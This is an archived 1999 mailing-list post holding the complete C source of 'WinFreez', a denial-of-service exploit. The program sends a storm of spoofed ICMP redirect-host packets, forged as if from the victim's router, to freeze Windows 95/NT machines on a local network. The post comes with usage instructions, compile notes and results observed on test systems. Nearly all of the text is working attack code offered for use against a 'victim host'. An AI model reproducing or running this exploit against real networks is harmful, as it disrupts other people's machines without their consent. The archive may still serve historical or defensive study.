WinFreez.c

From: Delmore (delmoreat_private)
Date: Fri Mar 05 1999 - 00:20:21 PST

  • Next message: John E. Martin: "Re: SMTP server account probing" 

    /*
 WinFreez.c by Delmore <delmoreat_private>

 ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box
 in LAN.

 Usage: winfreez sendtoip sendfromip time
 where <sendtoip> is victim host, <sendfromip> is router
 for victim host, <time> is time in seconds to freeze victim.

 Note:
 I've written small exploit for freeze win9x/nt boxes in LAN.
 Proggy initiates ICMP/Redirect-host messages storm from router
 (use router ip). Windows will receive redirect-host messages
 and change own route table, therefore it will be frozen
 or slowly working during this time.

 On victim machine route table changes viewing with:
 ROUTE PRINT
 command in ms-dos box.

 Exploit show different result for different system configuration.

 System results:

 p200/16ram/win95osr2 is slowly execute application
 after 20 seconds of storm.

 p233/96ram/nt4-sp4 is slowly working after 30
 seconds of storm.

 p2-266/64ram/win95 working slowly and can't normal execute
 application.


 Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
 gcc ./winfreez.c -o winfreez

 --- for Slackware Linux, Kernel 2.0.30
 If you can't compile due to ip_sum not defined errors,
 replace (line 207):
  ip->ip_sum = 0;
 to line:
  ip->ip_csum = 0;
 ---

 Soldiers Of Satan group
 Russia, Moscow State University, 05 march 1999
 http://sos.nanko.ru

 Thanx to Mark Henderson.

 */

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/*
 * Structure of an icmp header (from sparc header).
 */

struct icmp {
 u_char icmp_type; /* type of message, see below */
 u_char icmp_code; /* type sub code */
 u_short icmp_cksum; /* ones complement cksum of struct */

union {
 u_char ih_pptr; /* ICMP_PARAMPROB */
 struct in_addr ih_gwaddr; /* ICMP_REDIRECT */
 struct ih_idseq {
 n_short icd_id;
 n_short icd_seq;
} ih_idseq;

int ih_void;
} icmp_hun;

#define icmp_pptr icmp_hun.ih_pptr
#define icmp_gwaddr icmp_hun.ih_gwaddr
#define icmp_id icmp_hun.ih_idseq.icd_id
#define icmp_seq icmp_hun.ih_idseq.icd_seq
#define icmp_void icmp_hun.ih_void

union {
 struct id_ts {
 n_time its_otime;
 n_time its_rtime;
 n_time its_ttime;
} id_ts;

struct id_ip  {
struct ip idi_ip;
/* options and then 64 bits of data */
} id_ip;

u_long id_mask;
char id_data[1];
} icmp_dun;

#define icmp_otime icmp_dun.id_ts.its_otime
#define icmp_rtime icmp_dun.id_ts.its_rtime
#define icmp_ttime icmp_dun.id_ts.its_ttime
#define icmp_ip icmp_dun.id_ip.idi_ip
#define icmp_mask icmp_dun.id_mask
#define icmp_data icmp_dun.id_data

};


u_short in_cksum (u_short *addr, int len);
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );


void main (int argc, char **argv)
{
  time_t wtime;
  char *sendtoip, *sendfromip;
  int s, on;

  if (argc != 4)
    {
      fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
      exit (1);
    }

  sendtoip = (char *)malloc(strlen(argv[1]) + 1);
  strcpy(sendtoip, argv[1]);

  sendfromip = (char *)malloc(strlen(argv[2]) + 1);
  strcpy(sendfromip, argv[2]);

  wtime = atol(argv[3]);

  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
      fprintf (stderr, "socket creation error\n" );
      exit (1);
    }

#ifdef IP_HDRINCL
  if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0)
    {
      fprintf (stderr, "sockopt IP_HDRINCL error\n" );
      exit (1);
    }
#endif

  printf("winfreez by Delmore, <delmoreat_private>\n");
  printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
  printf("sendto = %s\n", sendtoip);
  printf("sendfrom = %s\n", sendfromip);
  printf("time = %i s\n", wtime);

  attack( sendtoip, sendfromip, wtime, s );

  free( (void *) sendtoip );
  free( (void *) sendfromip );
}


void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
{
  time_t curtime, endtime;
  int i1, i2, i3, i4;
  char redir[21];
  char buf[100];
  struct ip *ip = (struct ip *) buf;
  struct icmp *icmp = (struct icmp *) (ip + 1);
  struct hostent *hp;
  struct sockaddr_in dst;

  if(wtime==0) return;

  if ((hp = gethostbyname (sendtoip)) == NULL)
   if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1)
     {
      fprintf (stderr, "%s: unknown sendto\n", sendtoip);
      exit (1);
     }

  if ((hp = gethostbyname (sendfromip)) == NULL)
   if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1)
     {
      fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
      exit (1);
     }

  endtime = time(NULL) + wtime;

  srand((unsigned int) endtime);

 do {
  bzero (buf, sizeof buf);

  /* sendto/gateway */
  hp = gethostbyname (sendtoip);
  bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
  bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);

  /* sendfrom */
  hp = gethostbyname (sendfromip);
  bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);

  /* generate redirect*/
  i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
  i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
  i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
  i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));

  bzero (redir, sizeof redir);
  sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );

  hp = gethostbyname (redir);
  bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);

  ip->ip_v = 4;
  ip->ip_hl = sizeof *ip >> 2;
  ip->ip_tos = 0;
  ip->ip_len = htons (sizeof buf);
  ip->ip_id = htons (4321);
  ip->ip_off = 0;
  ip->ip_ttl = 255;
  ip->ip_p = 1;
  ip->ip_sum = 0;               /* kernel fills this in */

  bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof
(ip->ip_dst.s_addr));
  icmp->icmp_ip.ip_v = 4;
  icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
  icmp->icmp_ip.ip_tos = 0;
  icmp->icmp_ip.ip_len = htons (100);   /* doesn't matter much */
  icmp->icmp_ip.ip_id = htons (3722);
  icmp->icmp_ip.ip_off = 0;
  icmp->icmp_ip.ip_ttl = 254;
  icmp->icmp_ip.ip_p = 1;
  icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);

  dst.sin_addr = ip->ip_dst;
  dst.sin_family = AF_INET;

  icmp->icmp_type = ICMP_REDIRECT;
  icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
  icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof
(*ip));

  if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) <
0 )
    {
      fprintf (stderr, "sendto error\n");
      exit (1);
    }

  }while (time(NULL)!=endtime);
}

/*
 * in_cksum -- Checksum routine for Internet Protocol family headers (C
 * Version) - code from 4.4 BSD
 */
u_short in_cksum (u_short *addr, int len)
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  /*
   * Our algorithm is simple, using a 32 bit accumulator (sum), we add
   * sequential 16 bit words to it, and at the end, fold back all the
   * carry bits from the top 16 bits into the lower 16 bits.
   */
  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }

  /* mop up an odd byte, if necessary */
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }
  /* add back carry outs from top 16 bits to low 16 bits */
  sum = (sum >> 16) + (sum & 0xffff);   /* add hi 16 to low 16 */
  sum += (sum >> 16);           /* add carry */
  answer = ~sum;                /* truncate to 16 bits */
  return (answer);
}

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:38:26 PDT